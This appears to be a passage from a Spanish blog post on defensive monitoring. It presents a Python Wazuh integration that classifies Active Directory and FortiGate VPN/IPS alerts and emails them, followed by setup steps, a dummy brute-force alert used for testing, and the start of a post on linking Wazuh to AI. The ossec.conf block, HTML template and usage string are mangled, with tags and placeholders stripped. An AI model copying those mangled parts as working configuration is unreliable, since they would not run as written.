        elif rule_id in fgt_ips_rules:
            return "fortigate_ips"
        else:
            # Detectar por contenido si no es por rule_id
            rule_desc = self._get_field(alert, "rule.description", default="").lower()
            if any(term in rule_desc for term in ["active directory", "windows", "user account", "group"]):
                return "active_directory"
            elif any(term in rule_desc for term in ["vpn", "admin", "brute"]):
                return "fortigate_vpn"
            elif any(term in rule_desc for term in ["ips", "attack", "exploit", "malware"]):
                return "fortigate_ips"
            else:
                return "generic"

    def _extract_common_data(self, alert: Dict[str, Any]) -> Dict[str, Any]:
        """Extraer datos comunes a todos los tipos de alerta"""
        data = {
            "rule_id": self._get_field(alert, "rule.id"),
            "rule_level": self._get_field(alert, "rule.level"),
            "rule_desc": self._get_field(alert, "rule.description"),
            "rule_groups": self._get_field(alert, "rule.groups"),
            "fired_times": self._get_field(alert, "rule.firedtimes", default="1"),
            "agent_name": self._get_field(alert, "agent.name"),
            "agent_id": self._get_field(alert, "agent.id"),
            "manager_name": self._get_field(alert, "manager.name"),
            "timestamp": self._format_timestamp(self._get_field(alert, "timestamp", "data.eventtime")),
            "location": self._get_field(alert, "location"),
            "decoder": self._get_field(alert, "decoder.name")
        }

        return data

    def _extract_ad_data(self, alert: Dict[str, Any]) -> Dict[str, Any]:
        """Extraer datos específicos de Active Directory"""
        data = self._extract_common_data(alert)

        data["subject_user"] = self._get_field(alert, "data.win.eventdata.subjectUserName")
        data["subject_domain"] = self._get_field(alert, "data.win.eventdata.subjectDomainName")
        data["target_user"] = self._get_field(alert, "data.win.eventdata.targetUserName")
        data["sam_account"] = self._get_field(alert, "data.win.eventdata.samAccountName")
        data["user_principal"] = self._get_field(alert, "data.win.eventdata.userPrincipalName")
        data["display_name"] = self._get_field(alert, "data.win.eventdata.displayName")
        data["group_name"] = self._get_field(alert, "data.win.eventdata.targetUserName")
        data["member_name"] = self._get_field(alert, "data.win.eventdata.memberName")
        data["computer"] = self._get_field(alert, "data.win.system.computer")
        data["event_id"] = self._get_field(alert, "data.win.system.eventID")

        group_name = data.get("group_name", "")
        data["is_privileged"] = group_name in self.privileged_groups
        data["is_anonymous"] = data.get("subject_user", "") == "ANONYMOUS LOGON"

        event_id = data["event_id"]
        if event_id == "4720":
            data["title"] = "Usuario Creado en Active Directory"
            data["color"] = "#059669"
            data["priority"] = "MEDIO"
            data["pivot"] = data["target_user"]
        elif event_id == "4726":
            data["title"] = "Usuario Eliminado de Active Directory"
            data["color"] = "#dc2626"
            data["priority"] = "ALTO"
            data["pivot"] = data["target_user"]
        elif event_id in ("4732", "4728"):
            action = "Alta en Grupo"
            group_type = "LOCAL" if event_id == "4732" else "GLOBAL"
            data["title"] = f"{action} {group_type}"
            data["color"] = "#0284c7" if event_id == "4732" else "#ea580c"
            data["priority"] = "CRÍTICO" if data["is_privileged"] else "MEDIO"
            data["pivot"] = f"{data['member_name']} → {data['group_name']}"
        elif event_id in ("4733", "4729"):
            action = "Baja de Grupo"
            group_type = "LOCAL" if event_id == "4733" else "GLOBAL"
            data["title"] = f"{action} {group_type}"
            data["color"] = "#6b7280" if event_id == "4733" else "#9ca3af"
            data["priority"] = "MEDIO" if data["is_privileged"] else "BAJO"
            data["pivot"] = f"{data['member_name']} ← {data['group_name']}"
        else:
            data["title"] = f"Evento Active Directory {event_id}"
            data["color"] = "#6366f1"
            data["priority"] = "MEDIO"
            data["pivot"] = data.get("target_user", "N/A")

        return data

    def _extract_fortigate_vpn_data(self, alert: Dict[str, Any]) -> Dict[str, Any]:
        """Extraer datos específicos de FortiGate VPN/Admin"""
        data = self._extract_common_data(alert)

        data["dst_user"] = self._get_field(alert, "data.dstuser", "data.user", "data.srcuser")
        data["status"] = self._get_field(alert, "data.status")
        data["reason"] = self._get_field(alert, "data.reason")
        data["log_desc"] = self._get_field(alert, "data.logdesc")
        data["ui"] = self._get_field(alert, "data.ui")
        data["method"] = self._get_field(alert, "data.method")
        data["action"] = self._get_field(alert, "data.action")
        data["dev_name"] = self._get_field(alert, "data.devname")
        data["dev_id"] = self._get_field(alert, "data.devid")

        src_ip = self._get_field(alert, "data.srcip", "data.remip")
        if not src_ip or src_ip == "-":
            ui_text = data.get("ui", "")
            ip_match = re.search(r'(\d{1,3}(?:\.\d{1,3}){3})', ui_text)
            src_ip = ip_match.group(1) if ip_match else "-"
        data["src_ip"] = src_ip

        geo_info = self._get_geoip_info(src_ip)
        data["country"] = geo_info.get("country", "")
        data["iso"] = geo_info.get("iso", "")
        data["city"] = geo_info.get("city", "")
        data["is_high_risk"] = data["country"] in self.high_risk_countries

        method = data.get("method", "").lower()
        ui = data.get("ui", "").lower()
        action = data.get("action", "").lower()

        if "ssh" in method or "ssh(" in ui:
            data["vector"] = "SSH"
        elif "https" in method or "http(" in ui or "https(" in ui:
            data["vector"] = "Web (HTTPS)"
        elif "tunnel" in action or "vpn" in action:
            data["vector"] = "VPN"
        else:
            data["vector"] = "Desconocido"

        rule_id = data["rule_id"]
        if rule_id == "196100":
            data["title"] = "FortiGate ADMIN Brute-Force Attack"
            data["color"] = "#dc2626"
            data["priority"] = "CRÍTICO"
            data["pivot"] = data["src_ip"]
            data["recommendation"] = "Bloquear IP inmediatamente. Revisar logs de intentos previos."
        elif rule_id == "196101":
            data["title"] = "FortiGate VPN SSL Brute-Force Attack"
            data["color"] = "#b91c1c"
            data["priority"] = "CRÍTICO"
            data["pivot"] = f"{data['dst_user']} from {data['src_ip']}"
            data["recommendation"] = "Bloquear IP y verificar estado de la cuenta VPN."
        elif rule_id == "196102":
            data["title"] = "VPN - Conexión Fuera de Horario Laboral"
            data["color"] = "#ea580c"
            data["priority"] = "MEDIO-ALTO"
            data["pivot"] = f"{data['dst_user']} @ {data['timestamp']}"
            data["recommendation"] = "Verificar si el acceso es autorizado con el usuario."
        elif rule_id == "196103":
            data["title"] = "VPN - Conexión Fin de Semana"
            data["color"] = "#f59e0b"
            data["priority"] = "MEDIO"
            data["pivot"] = f"{data['dst_user']} @ {data['timestamp']}"
            data["recommendation"] = "Verificar si el acceso de fin de semana es necesario."
        elif rule_id == "196104":
            data["title"] = "POSIBLE COMPROMISO DE CUENTA VPN"
            data["color"] = "#7f1d1d"
            data["priority"] = "EMERGENCIA"
            data["pivot"] = f"Usuario {data['dst_user']} - Múltiples países"
            data["recommendation"] = "DESHABILITAR CUENTA INMEDIATAMENTE. Contactar usuario."
        elif rule_id == "196106":
            data["title"] = "Conexión desde TOR/Proxy Anónimo"
            data["color"] = "#b91c1c"
            data["priority"] = "CRÍTICO"
            data["pivot"] = f"IP TOR: {data['src_ip']}"
            data["recommendation"] = "Bloquear todas las conexiones desde nodos TOR."
        else:
            level = int(data.get("rule_level", "0"))
            if level >= 12:
                data["title"] = "FortiGate Critical Security Alert"
                data["color"] = "#dc2626"
                data["priority"] = "CRÍTICO"
            elif level >= 10:
                data["title"] = "FortiGate High Security Alert"
                data["color"] = "#ea580c"
                data["priority"] = "ALTO"
            else:
                data["title"] = "FortiGate Security Event"
                data["color"] = "#f59e0b"
                data["priority"] = "MEDIO"

            data["pivot"] = f"{data.get('dst_user', 'N/A')} @ {data['src_ip']}"
            data["recommendation"] = "Revisar evento para determinar acciones necesarias."

        return data

    def _extract_fortigate_ips_data(self, alert: Dict[str, Any]) -> Dict[str, Any]:
        """Extraer datos específicos de IPS de FortiGate"""
        data = self._extract_common_data(alert)

        # Campos específicos de IPS
        data["src_ip"] = self._get_field(alert, "data.srcip")
        data["dst_ip"] = self._get_field(alert, "data.dstip")
        data["dst_port"] = self._get_field(alert, "data.dstport")
        data["attack"] = self._get_field(alert, "data.attack", "data.attack_name", "data.signature")
        data["severity"] = self._get_field(alert, "data.severity")
        data["action"] = self._get_field(alert, "data.action")
        data["protocol"] = self._get_field(alert, "data.proto", "data.protocol")
        data["dev_name"] = self._get_field(alert, "data.devname")
        data["dev_id"] = self._get_field(alert, "data.devid")

        # GeoIP para IP origen
        geo_info = self._get_geoip_info(data["src_ip"])
        data["country"] = geo_info.get("country", "")
        data["iso"] = geo_info.get("iso", "")
        data["city"] = geo_info.get("city", "")
        data["is_high_risk"] = data["country"] in self.high_risk_countries

        # Determinar criticidad y tipo
        severity = data.get("severity", "").lower()
        attack_name = data.get("attack", "").lower()
        action = data.get("action", "").lower()

        # Configurar por severidad
        if severity == "critical":
            data["priority"] = "CRÍTICO"
            data["color"] = "#dc2626"
            data["title"] = f"IPS CRÍTICO: {data['attack']}"
        elif severity == "high":
            data["priority"] = "ALTO"
            data["color"] = "#ea580c"
            data["title"] = f"IPS ALTO: {data['attack']}"
        elif severity == "medium":
            data["priority"] = "MEDIO"
            data["color"] = "#f59e0b"
            data["title"] = f"IPS MEDIO: {data['attack']}"
        else:
            data["priority"] = "BAJO"
            data["color"] = "#3b82f6"
            data["title"] = f"IPS: {data['attack']}"

        # Ajustar por acción
        if action == "detected" and severity in ["critical", "high"]:
            data["priority"] = "EMERGENCIA"
            data["color"] = "#7f1d1d"
            data["title"] = "ATAQUE CRÍTICO NO BLOQUEADO"
            data["recommendation"] = "BLOQUEAR IP INMEDIATAMENTE - Ataque no fue bloqueado por IPS"

        # Detectar tipo de ataque específico
        if "sql" in attack_name or "injection" in attack_name:
            data["attack_type"] = "SQL Injection"
            data["recommendation"] = "Revisar WAF y logs de aplicación web. Verificar consultas SQL."
        elif "xss" in attack_name or "cross-site" in attack_name:
            data["attack_type"] = "Cross-Site Scripting"
            data["recommendation"] = "Validar entrada de usuarios. Revisar sanitización de datos."
        elif "command" in attack_name and "injection" in attack_name:
            data["attack_type"] = "Command Injection"
            data["recommendation"] = "Revisar ejecución de comandos en aplicación. Deshabilitar funciones peligrosas."
        elif "dos" in attack_name or "ddos" in attack_name or "flood" in attack_name:
            data["attack_type"] = "Denial of Service"
            data["recommendation"] = "Activar mitigación DDoS. Considerar rate limiting."
        elif "malware" in attack_name or "trojan" in attack_name or "virus" in attack_name:
            data["attack_type"] = "Malware"
            data["recommendation"] = "Escanear sistemas afectados. Aislar hosts comprometidos."
        elif "ransomware" in attack_name:
            data["attack_type"] = "Ransomware"
            data["recommendation"] = "AISLAR RED INMEDIATAMENTE. Verificar backups. Contactar equipo de respuesta."
            data["priority"] = "EMERGENCIA"
            data["color"] = "#7f1d1d"
        elif "exploit" in attack_name or "cve-" in attack_name:
            data["attack_type"] = "Exploit Attempt"
            data["recommendation"] = "Verificar parches de seguridad. Revisar CVE mencionado."
        elif "buffer" in attack_name and "overflow" in attack_name:
            data["attack_type"] = "Buffer Overflow"
            data["recommendation"] = "Actualizar software vulnerable. Verificar parches disponibles."
        elif "scan" in attack_name or "nmap" in attack_name:
            data["attack_type"] = "Network Scan"
            data["recommendation"] = "Monitorear IP origen para detectar fase de explotación."
        elif "wordpress" in attack_name or "wp-" in attack_name:
            data["attack_type"] = "WordPress Attack"
            data["recommendation"] = "Actualizar WordPress y plugins. Revisar permisos de archivos."
        else:
            data["attack_type"] = "IPS Detection"
            data["recommendation"] = "Revisar logs del firewall para más detalles."

        data["pivot"] = f"{data['src_ip']} → {data['dst_ip']}:{data['dst_port']} • {data['attack']}"

        return data

    def _build_ad_info_rows(self, data: Dict[str, Any]) -> str:
        """Construir filas de información para Active Directory"""
        esc = lambda x: html.escape(str(x or "-"))

        rows = []
        event_id = data.get("event_id", "")

        if event_id in ("4720", "4726"):
            rows.extend([
                f"Usuario:{esc(data.get('target_user', ''))}",
                f"SAM Account:{esc(data.get('sam_account', ''))}",
                f"UPN:{esc(data.get('user_principal', ''))}",
                f"Nombre:{esc(data.get('display_name', ''))}"
            ])
        elif event_id in ("4732", "4733", "4728", "4729"):
            privilege_badge = self._create_badge("GRUPO PRIVILEGIADO", "danger") if data.get("is_privileged") else ""
            rows.extend([
                f"Miembro:{esc(data.get('member_name', ''))}",
                f"Grupo:{esc(data.get('group_name', ''))} {privilege_badge}"
            ])

        anon_badge = self._create_badge("ANONYMOUS LOGON", "warning") if data.get("is_anonymous") else ""
        agent_name = data.get('agent_name', '')
        agent_id = data.get('agent_id', '')
        agent_badge = self._create_badge(f"{agent_name} (ID {agent_id})", 'default')
        computer_badge = self._create_badge(data.get('computer', ''), 'info')

        rows.extend([
            f"Ejecutado por:{esc(data.get('subject_user', ''))} [{esc(data.get('subject_domain', ''))}] {anon_badge}",
            f"Equipo/DC:{computer_badge}",
            f"Agente Wazuh:{agent_badge}",
            f"Timestamp:{esc(data.get('timestamp', ''))}",
            f"Intentos:{esc(data.get('fired_times', '1'))}"
        ])

        return "\n".join(rows)

    def _build_fgt_vpn_info_rows(self, data: Dict[str, Any]) -> str:
        """Construir filas de información para FortiGate VPN/Admin"""
        esc = lambda x: html.escape(str(x or "-"))

        geo_badge = ""
        if data.get("country"):
            flag = self._get_country_flag(data.get("iso", ""))
            geo_text = f"{flag} {data['country']}"
            if data.get("city"):
                geo_text += f" • {data['city']}"

            geo_style = "geo-risk" if data.get("is_high_risk") else "geo"
            geo_badge = self._create_badge(geo_text, geo_style)

        vector_badge = self._create_badge(data.get('vector', 'Desconocido'), 'info')
        dev_name = data.get('dev_name', '')
        dev_id = data.get('dev_id', '')
        device_badge = self._create_badge(f"{dev_name} / {dev_id}", 'default')
        agent_name = data.get('agent_name', '')
        agent_id = data.get('agent_id', '')
        agent_badge = self._create_badge(f"{agent_name} (ID {agent_id})", 'warning')
        status_badge = self._create_badge(data.get('status', ''), 'default')

        rows = [
            f"IP Origen:{esc(data.get('src_ip', ''))} {geo_badge}",
            f"Usuario:{esc(data.get('dst_user', ''))}",
            f"Vector:{vector_badge}",
            f"Dispositivo:{device_badge}",
            f"Agente Wazuh:{agent_badge}",
            f"Estado:{status_badge} • {esc(data.get('reason', ''))}",
            f"Descripción:{esc(data.get('log_desc', ''))}",
            f"Intentos:{esc(data.get('fired_times', '1'))}",
            f"Timestamp:{esc(data.get('timestamp', ''))}"
        ]

        return "\n".join(rows)

    def _build_ips_info_rows(self, data: Dict[str, Any]) -> str:
        """Construir filas de información para IPS"""
        esc = lambda x: html.escape(str(x or "-"))

        # Badge de GeoIP
        geo_badge = ""
        if data.get("country"):
            flag = self._get_country_flag(data.get("iso", ""))
            geo_text = f"{flag} {data['country']}"
            if data.get("city"):
                geo_text += f" • {data['city']}"

            geo_style = "geo-risk" if data.get("is_high_risk") else "geo"
            geo_badge = self._create_badge(geo_text, geo_style)

        # Badges
        severity_styles = {
            "critical": "critical",
            "high": "danger",
            "medium": "warning",
            "low": "info"
        }
        severity_badge = self._create_badge(
            data.get('severity', 'unknown').upper(),
            severity_styles.get(data.get('severity', '').lower(), 'default')
        )

        action_style = "danger" if data.get('action') == 'detected' else "success"
        action_badge = self._create_badge(data.get('action', '').upper(), action_style)

        attack_type_badge = self._create_badge(data.get('attack_type', 'IPS Detection'), 'info')

        device_badge = self._create_badge(f"{data.get('dev_name', '')} / {data.get('dev_id', '')}", 'default')
        agent_badge = self._create_badge(f"{data.get('agent_name', '')} (ID {data.get('agent_id', '')})", 'warning')

        rows = [
            f"Tipo de Ataque:{attack_type_badge}",
            f"Firma:{esc(data.get('attack', ''))}",
            f"IP Origen:{esc(data.get('src_ip', ''))} {geo_badge}",
            f"IP Destino:{esc(data.get('dst_ip', ''))}:{esc(data.get('dst_port', ''))}",
            f"Severidad:{severity_badge}",
            f"Acción IPS:{action_badge}",
            f"Protocolo:{esc(data.get('protocol', ''))}",
            f"Dispositivo:{device_badge}",
            f"Agente Wazuh:{agent_badge}",
            f"Intentos:{esc(data.get('fired_times', '1'))}",
            f"Timestamp:{esc(data.get('timestamp', ''))}"
        ]

        return "\n".join(rows)

    def _build_generic_info_rows(self, data: Dict[str, Any]) -> str:
        """Construir filas de información para alertas genéricas"""
        esc = lambda x: html.escape(str(x or "-"))

        agent_name = data.get('agent_name', '')
        agent_id = data.get('agent_id', '')
        agent_badge = self._create_badge(f"{agent_name} (ID {agent_id})", 'default')
        decoder_badge = self._create_badge(data.get('decoder', ''), 'info')

        rows = [
            f"Agente:{agent_badge}",
            f"Ubicación:{esc(data.get('location', ''))}",
            f"Decoder:{decoder_badge}",
            f"Grupos:{esc(data.get('rule_groups', ''))}",
            f"Intentos:{esc(data.get('fired_times', '1'))}",
            f"Timestamp:{esc(data.get('timestamp', ''))}"
        ]

        return "\n".join(rows)

    def _build_html_body(self, data: Dict[str, Any], alert_type: str) -> str:
        """Construir cuerpo HTML del email con template unificado"""
        esc = lambda x: html.escape(str(x or "-"))

        css_styles = """
        
        """

        priority_styles = {
            "EMERGENCIA": "critical",
            "CRÍTICO URGENTE": "critical",
            "CRÍTICO": "danger",
            "ALTO": "warning",
            "MEDIO-ALTO": "warning",
            "MEDIO": "info",
            "BAJO": "default"
        }
        priority_style = priority_styles.get(data.get("priority", "MEDIO"), "default")

        badges_html = f"""
            {self._create_badge(f"RULE {data['rule_id']} • NIVEL {data['rule_level']}", "info")}
            {self._create_badge(data.get('priority', 'MEDIO'), priority_style)}
        """

        pivot_html = f"""
        
            Información Principal:
            {esc(data.get('pivot', 'N/A'))}
        
        """

        if alert_type == "active_directory":
            info_rows = self._build_ad_info_rows(data)
        elif alert_type == "fortigate_vpn":
            info_rows = self._build_fgt_vpn_info_rows(data)
        elif alert_type == "fortigate_ips":
            info_rows = self._build_ips_info_rows(data)
        else:
            info_rows = self._build_generic_info_rows(data)

        recommendation_html = ""
        if data.get("recommendation"):
            recommendation_html = f"""
            
                Recomendación:
                {esc(data['recommendation'])}
            
            """

        actions_html = f"""
        
            Acciones Sugeridas:
            
                Revisar actividad reciente en los logs del sistema
                Verificar la legitimidad del evento con usuarios involucrados
                Documentar el incidente en el sistema de tickets
                Aplicar medidas correctivas si es necesario
                {f"{data['recommendation']}
" if data.get('recommendation') else ""}
            
        
        """

        return f"""


    
    
    <span class="hljs-subst">{esc(data.get(<span class="hljs-string">'title'</span>, <span class="hljs-string">'Wazuh Alert'</span>))}</span>
    {css_styles}


    
        
            {data.get('title', 'Alerta de Seguridad')}
            {esc(data.get('rule_desc', ''))}
            {badges_html}
        

        {pivot_html}

        {info_rows}
            
        

        {recommendation_html}

        {actions_html}

        
            Wazuh SIEM Alert • Unified Email Notifier v4.0

            Generado: {datetime.now().strftime('%d/%m/%Y %H:%M:%S')}
        
    

"""

    def _build_text_body(self, data: Dict[str, Any], alert_type: str) -> str:
        """Construir cuerpo de texto plano del email"""
        lines = [
            f"{data.get('title', 'Alerta de Seguridad')}",
            "=" * 80,
            f"PRIORIDAD: {data.get('priority', 'MEDIO')}",
            f"Rule: {data.get('rule_id', '')} (Nivel {data.get('rule_level', '')})",
            f"Descripción: {data.get('rule_desc', '')}",
            "",
            f"INFORMACIÓN PRINCIPAL: {data.get('pivot', 'N/A')}",
            "-" * 50
        ]

        if alert_type == "active_directory":
            lines.extend(self._build_ad_text_info(data))
        elif alert_type == "fortigate_vpn":
            lines.extend(self._build_fgt_text_info(data))
        elif alert_type == "fortigate_ips":
            lines.extend(self._build_ips_text_info(data))
        else:
            lines.extend(self._build_generic_text_info(data))

        lines.extend([
            "",
            f"Agente: {data.get('agent_name', '')} (ID {data.get('agent_id', '')})",
            f"Intentos: {data.get('fired_times', '1')}",
            f"Timestamp: {data.get('timestamp', '')}",
            ""
        ])

        if data.get("recommendation"):
            lines.extend([
                f"RECOMENDACIÓN: {data['recommendation']}",
                ""
            ])

        lines.extend([
            "ACCIONES SUGERIDAS:",
            "- Revisar actividad reciente en los logs",
            "- Verificar legitimidad con usuarios involucrados",
            "- Documentar en sistema de tickets",
            "- Aplicar medidas correctivas si es necesario",
            "",
            "=" * 80
        ])

        return "\n".join(lines)

    def _build_ad_text_info(self, data: Dict[str, Any]) -> list:
        """Información de texto para AD"""
        lines = []
        event_id = data.get("event_id", "")

        if event_id in ("4720", "4726"):
            lines.extend([
                f"Usuario: {data.get('target_user', '')}",
                f"SAM: {data.get('sam_account', '')}",
                f"UPN: {data.get('user_principal', '')}",
                f"Nombre: {data.get('display_name', '')}"
            ])
        elif event_id in ("4732", "4733", "4728", "4729"):
            privilege_note = " [GRUPO PRIVILEGIADO]" if data.get("is_privileged") else ""
            lines.extend([
                f"Miembro: {data.get('member_name', '')}",
                f"Grupo: {data.get('group_name', '')}{privilege_note}"
            ])

        anon_note = " [ANONYMOUS LOGON]" if data.get("is_anonymous") else ""
        lines.extend([
            f"Ejecutado por: {data.get('subject_user', '')} [{data.get('subject_domain', '')}]{anon_note}",
            f"Equipo/DC: {data.get('computer', '')}"
        ])

        return lines

    def _build_fgt_text_info(self, data: Dict[str, Any]) -> list:
        """Información de texto para FortiGate VPN/Admin"""
        geo_info = ""
        if data.get("country"):
            geo_info = f" ({data['country']}"
            if data.get("city"):
                geo_info += f" - {data['city']}"
            geo_info += ")"
            if data.get("is_high_risk"):
                geo_info += " [PAÍS DE ALTO RIESGO]"

        return [
            f"IP Origen: {data.get('src_ip', '')}{geo_info}",
            f"Usuario: {data.get('dst_user', '')}",
            f"Vector: {data.get('vector', 'Desconocido')}",
            f"Dispositivo: {data.get('dev_name', '')} / {data.get('dev_id', '')}",
            f"Estado: {data.get('status', '')}  Motivo: {data.get('reason', '')}",
            f"Log: {data.get('log_desc', '')}"
        ]

    def _build_ips_text_info(self, data: Dict[str, Any]) -> list:
        """Información de texto para IPS"""
        geo_info = ""
        if data.get("country"):
            geo_info = f" ({data['country']}"
            if data.get("city"):
                geo_info += f" - {data['city']}"
            geo_info += ")"
            if data.get("is_high_risk"):
                geo_info += " [PAÍS DE ALTO RIESGO]"

        return [
            f"Tipo de Ataque: {data.get('attack_type', 'IPS Detection')}",
            f"Firma: {data.get('attack', '')}",
            f"IP Origen: {data.get('src_ip', '')}{geo_info}",
            f"IP Destino: {data.get('dst_ip', '')}:{data.get('dst_port', '')}",
            f"Severidad: {data.get('severity', '').upper()}",
            f"Acción IPS: {data.get('action', '').upper()}",
            f"Protocolo: {data.get('protocol', '')}",
            f"Dispositivo: {data.get('dev_name', '')} / {data.get('dev_id', '')}"
        ]

    def _build_generic_text_info(self, data: Dict[str, Any]) -> list:
        """Información de texto para alertas genéricas"""
        return [
            f"Ubicación: {data.get('location', '')}",
            f"Decoder: {data.get('decoder', '')}",
            f"Grupos: {data.get('rule_groups', '')}"
        ]

    def _build_subject(self, data: Dict[str, Any]) -> str:
        """Construir asunto del email"""
        prefix = self.config.get("subject_prefix", "[Wazuh SIEM]")
        priority = data.get("priority", "MEDIO")
        title = data.get("title", "Alerta de Seguridad")
        pivot = data.get("pivot", "N/A")
        level = data.get("rule_level", "")

        max_title_len = 40
        max_pivot_len = 30

        if len(title) > max_title_len:
            title = title[:max_title_len-3] + "..."
        if len(pivot) > max_pivot_len:
            pivot = pivot[:max_pivot_len-3] + "..."

        return f"{prefix} {priority} • {title} • {pivot} • L{level}"

    def _send_email(self, message: MIMEMultipart):
        """Enviar email con manejo robusto de errores"""
        smtp_config = {
            "host": self.config["smtp_host"],
            "port": int(self.config.get("smtp_port", 587)),
            "use_tls": bool(self.config.get("use_tls", True)),
            "username": self.config.get("username"),
            "password": self.config.get("password"),
            "timeout": int(self.config.get("timeout", 30))
        }

        recipients = self.config.get("to", [])
        if not recipients:
            raise ValueError("No hay destinatarios configurados")

        self.logger.info(f"Enviando email a {len(recipients)} destinatarios via {smtp_config['host']}:{smtp_config['port']}")

        try:
            if smtp_config["use_tls"]:
                context = ssl.create_default_context()
                if self.config.get("insecure_skip_verify", False):
                    context.check_hostname = False
                    context.verify_mode = ssl.CERT_NONE
                    self.logger.warning("Verificación SSL deshabilitada")

                with smtplib.SMTP(smtp_config["host"], smtp_config["port"],
                                timeout=smtp_config["timeout"]) as server:
                    server.ehlo()
                    server.starttls(context=context)
                    server.ehlo()

                    if smtp_config["username"] and smtp_config["password"]:
                        server.login(smtp_config["username"], smtp_config["password"])
                        self.logger.debug("Autenticación SMTP exitosa")

                    server.sendmail(message["From"], recipients, message.as_string())
            else:
                with smtplib.SMTP(smtp_config["host"], smtp_config["port"],
                                timeout=smtp_config["timeout"]) as server:
                    if smtp_config["username"] and smtp_config["password"]:
                        server.login(smtp_config["username"], smtp_config["password"])
                        self.logger.debug("Autenticación SMTP exitosa")

                    server.sendmail(message["From"], recipients, message.as_string())

            self.logger.info("Email enviado exitosamente")

        except smtplib.SMTPAuthenticationError as e:
            raise RuntimeError(f"Error de autenticación SMTP: {e}")
        except smtplib.SMTPRecipientsRefused as e:
            raise RuntimeError(f"Destinatarios rechazados: {e}")
        except smtplib.SMTPException as e:
            raise RuntimeError(f"Error SMTP: {e}")
        except Exception as e:
            raise RuntimeError(f"Error enviando email: {e}")

    def build_email(self, alert: Dict[str, Any]) -> Tuple[MIMEMultipart, str]:
        """Construir mensaje de email completo"""
        alert_type = self._detect_alert_type(alert)
        self.logger.info(f"Procesando alerta tipo: {alert_type}")

        if alert_type == "active_directory":
            data = self._extract_ad_data(alert)
        elif alert_type == "fortigate_vpn":
            data = self._extract_fortigate_vpn_data(alert)
        elif alert_type == "fortigate_ips":
            data = self._extract_fortigate_ips_data(alert)
        else:
            data = self._extract_common_data(alert)
            data["title"] = "Alerta de Seguridad Wazuh"
            data["color"] = "#6366f1"
            data["priority"] = "MEDIO"
            data["pivot"] = f"Rule {data['rule_id']} • {data.get('agent_name', 'N/A')}"

        html_body = self._build_html_body(data, alert_type)
        text_body = self._build_text_body(data, alert_type)
        subject = self._build_subject(data)

        message = MIMEMultipart("alternative")
        message["Subject"] = Header(subject, "utf-8")
        message["From"] = self.config.get("from", "wazuh@localhost")
        message["To"] = ", ".join(self.config.get("to", []))
        message["X-Priority"] = "1" if data.get("priority") in ["EMERGENCIA", "CRÍTICO URGENTE", "CRÍTICO"] else "3"

        message.attach(MIMEText(text_body, "plain", "utf-8"))
        message.attach(MIMEText(html_body, "html", "utf-8"))

        return message, subject

    def process_alert(self, alert_file: str):
        """Procesar alerta y enviar email"""
        try:
            alert = self._load_alert(alert_file)
            self.logger.info(f"Alerta cargada desde: {alert_file}")

            message, subject = self.build_email(alert)
            self.logger.info(f"Email construido: {subject}")

            self._send_email(message)
            self.logger.info("Procesamiento completado exitosamente")

        except Exception as e:
            self.logger.error(f"Error procesando alerta: {e}")
            raise


def main():
    """Función principal"""
    if len(sys.argv) < 4:
        print("Uso: custom-email-unified   ", file=sys.stderr)
        print("", file=sys.stderr)
        print("Ejemplos:", file=sys.stderr)
        print("  custom-email-unified /tmp/alert.json '' /var/ossec/etc/email-config.json", file=sys.stderr)
        print("", file=sys.stderr)
        sys.exit(1)

    alert_file = sys.argv[1]
    config_file = sys.argv[3]

    try:
        notifier = UnifiedEmailNotifier(config_file)
        notifier.process_alert(alert_file)
        print("Email enviado exitosamente")

    except Exception as e:
        print(f"ERROR: {e}", file=sys.stderr)
        sys.exit(1)


if __name__ == "__main__":
    main()

Como puedes notar el script tiene la posiblidad de enviar sobre reglas de Active Directory tambien, algo que puedes implementar sin problemas. No dejen de instalar sudo pip3 install geoip2.

Vamos a darle los permisos.

sudo chown root:wazuh /var/ossec/integrations/custom-email-unified
sudo chmod 750 /var/ossec/integrations/custom-email-unified

Por ultimo, vamos a agregar esto al ossec.conf.

  
    <name>custom-emailname>
    /var/ossec/etc/email-config.json
    14
    196207,196222,196228
    json
  

  


  
  
    <name>custom-emailname>
    /var/ossec/etc/email-config.json
    10
    196201,196202,196208,196212,196213,196217,196218,196220,196221,196226,196227,196230,196232
    json
  

  


  
  
    <name>custom-emailname>
    /var/ossec/etc/email-config.json
    7
    196100,196101,196104,196105,196112,196113
    json

Reiniciamos el manager.

sudo systemctl restart wazuh-manager.service

Prueba

Listo. Ahora si vamos a hacer las pruebas, para que las alarmas se disparen. Generamos la data dummy y ejecutamos.

cat > /tmp/test-vpn-bruteforce.json << 'EOF'
{
  "timestamp": "2025-10-05T14:40:00.000Z",
  "rule": {
    "id": "196101",
    "level": 12,
    "description": "FGT: SSL VPN bruteforce from same IP (10+ attempts in 3min)",
    "groups": ["fortigate", "vpn", "bruteforce", "critical"],
    "firedtimes": 15
  },
  "agent": {
    "id": "000",
    "name": "firewall-master"
  },
  "manager": {
    "name": "wazuh-manager-prod"
  },
  "data": {
    "srcip": "131.159.24.205",
    "remip": "131.159.24.205",
    "dstuser": "admin",
    "user": "admin",
    "status": "error",
    "reason": "authentication failed",
    "action": "ssl-login",
    "logdesc": "SSL VPN login fail",
    "method": "https",
    "ui": "https(131.159.24.205)",
    "devname": "FG-100F-PROD",
    "devid": "FG100FTK21002473"
  },
  "decoder": {
    "name": "fortigate-firewall-v5"
  },
  "location": "firewall->/var/log/fortigate.log"
}
EOF

sudo -u wazuh python3 /var/ossec/integrations/custom-email-unified   /tmp/test-vpn-bruteforce.json   ''   /var/ossec/etc/email-config.json

Voila!

Ya tenemos nuestro SIEM, ejecutando las reglas y avisandonos sobre los diferentes incidentes.

Dashboard

Cree unos Dashboard’s, uno para IPs y otro para VPNs.

Espero que les sirva, fue divertido generar estas alarmas. Si queres los dashboars, escribrime.

Saludos.

Aumenta el Valor de tus logs a través de la IA

Santiago Fernandez — Sun, 21 Sep 2025 23:51:22 GMT

Hace un tiempo escribí sobre Wazuh y Active Directory, y la verdad es que recibí muchos mensajes. Seguro que escribiré más sobre eso, pero ahora me voy a centrar en algo que estuve investigando en internet. Me pregunté: ¿Y si conectamos Wazuh a una IA? Como siempre, mucha gente ya estaba trabajando en eso, así que vamos a hacer el paso a paso para lograrlo nosotros mismos.

Antes que nada, les recomiendo leer los artículos de referencia. En esta Prueba de Concepto, vamos a crear nuestro propio servidor MCP para que se vincule con la API de Wazuh, utilizando las siguientes herramientas. Luego, puedes agregar lo que consideres necesario.

📋 Herramientas disponibles:

agents_summary - Resumen rápido de todos los agentes
active_agents - Lista solo agentes activos
search_agent - Buscar agentes por nombre o IP
manager_info - Información del manager Wazuh
agent_details - Detalles específicos de un agente

